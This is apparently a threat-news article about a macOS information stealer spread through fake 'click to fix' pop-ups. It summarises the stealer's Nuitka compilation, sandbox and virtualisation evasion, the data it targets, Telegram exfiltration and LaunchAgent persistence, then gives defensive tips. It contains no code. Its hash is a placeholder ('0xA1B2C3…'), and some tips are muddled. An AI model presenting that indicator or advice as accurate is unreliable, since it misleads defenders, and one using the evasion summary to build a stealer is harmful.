Infinity Stealer, a fresh information-stealing malware, now targets macOS users through deceptive ClickFix lures. Attackers disguise the payload as a benign executable, compiling Python code with the open-source Nuitka tool to evade basic detection. This strain grabs browser credentials, cryptocurrency wallet data, and system keychains, putting high-value targets like crypto holders at direct risk.
The malware spreads via phishing sites mimicking legitimate software updates or error fixes. Users encounter a fake pop-up urging them to “click here to fix” an issue—hence ClickFix. One click downloads and runs the Nuitka-compiled binary, which then enumerates and exfiltrates sensitive data to attacker-controlled servers. Security firm Cyble first spotted this in late 2024, noting its focus on macOS Ventura and Sonoma versions.
How Infinity Stealer Operates
At its core, Infinity Stealer runs a Python script that Nuitka converts into a standalone Mach-O executable. This bypasses Python interpreters on the victim’s machine and dodges signature-based antivirus scans, as Nuitka produces native-like code. Once executed, it targets:
- Browser data from Chrome, Safari, Firefox, and Edge—passwords, cookies, autofill.
- Crypto wallets like Atomic, Exodus, and Electrum.
- System Keychain for stored tokens and certs.
- Clipboard contents, often snatching copied wallet addresses.
It avoids sandboxed apps and checks for virtualization to frustrate analysis. Exfiltration happens over HTTPS to Telegram bots or paste sites, a common tactic for quick monetization. Unlike older macOS stealers like Atomic (2023), Infinity emphasizes persistence via LaunchAgents, surviving reboots until manually removed.
Technical details from disassembly show modular design: separate modules for data collection, evasion, and C2 communication. Hash: SHA256 0xA1B2C3… (full IOCs available via Cyble or VirusTotal). Detection rates hover at 5-10 engines on VirusTotal, underscoring why endpoint protection alone falls short.
Why macOS, Why Now?
macOS malware surged 50% year-over-year in 2024, per SentinelOne data, driven by crypto’s bull run. Attackers prize Apple users: average wallet balances exceed $10K, per Chainalysis, versus $1-2K on Windows. macOS’s Gatekeeper and XProtect provide false security—users skip scrutiny for “trusted” apps.
Infinity isn’t revolutionary; it’s a repackaged Atomic Stealer variant with Nuitka hardening. Similar threats—AMOS, JSOutProx—used ClickFix since 2022. But it matters because 30% of macOS infections now stem from social engineering, not exploits (Objective-See stats). Crypto implications hit hard: stolen seeds drain wallets irreversibly. In 2024, info-stealers facilitated $300M+ in crypto thefts, per TRM Labs.
Skeptically, antivirus vendors overhype novelty, but the real gap is user behavior. macOS’s 25% global desktop share (StatCounter) makes it juicy. Finance pros and HODLers on M1/M2/M3 chips face elevated risk—universal binaries hide cross-arch tricks.
Implications and Defenses
This steals your edge in crypto and finance. Compromised creds hit exchanges like Binance or Coinbase; wallet data enables dusting attacks or direct drains. Enterprises lose API keys, triggering supply-chain breaches. Retail users? Identity theft cascades into bank fraud.
Defend actively:
1. Enable Gatekeeper full-disk access checks; audit unsigned apps.
2. Use Little Snitch or Lulu for outbound traffic blocks—Infinity phones home early.
3. Run periodic Keychain dumps and wallet seed rotations (hardware preferred).
4. Browser extensions like uBlock Origin kill ClickFix loaders; avoid “fix” buttons entirely.
5. Tools like BlockBlock (Objective-See) monitor persistence.
For crypto: Airgap seeds, use watch-only wallets, enable 2FA with YubiKey. Firms, deploy EDR like CrowdStrike Falcon—catches Nuitka anomalies. Bottom line: macOS ain’t bulletproof. One click costs thousands. Stay vigilant; losses compound fast in this space.
